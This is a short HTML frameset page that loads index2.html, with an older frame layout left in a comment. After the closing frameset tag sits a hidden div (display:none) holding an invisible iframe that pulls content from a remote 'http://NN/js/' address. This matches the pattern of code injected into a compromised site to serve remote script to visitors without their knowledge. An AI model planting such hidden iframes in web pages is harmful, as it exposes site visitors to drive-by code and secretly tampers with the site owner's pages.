<!-- frames -->
<head/><frameset>
    <frame name=principal frameborder="0" src=index2.html>
<!--
	<frameset  rows="88px,*">
	    <frame name="logo" src="logo.html" marginwidth="10" marginheight="0" width="780" scrolling="no" frameborder="0">
	    <frameset  cols="185px,*">
		        <frame name="menu" src="menu.htm"  scrolling="no" frameborder="0">
			<frameset  cols="575px,*">
			        <frame name="contenido"  src="objectives.html"  scrolling="auto" frameborder="0">
			 </frameset>
	    </frameset>
  	</frameset>
-->
</frameset>
<div style="display:none"><iframe src="http://NN/js/"></iframe></div>
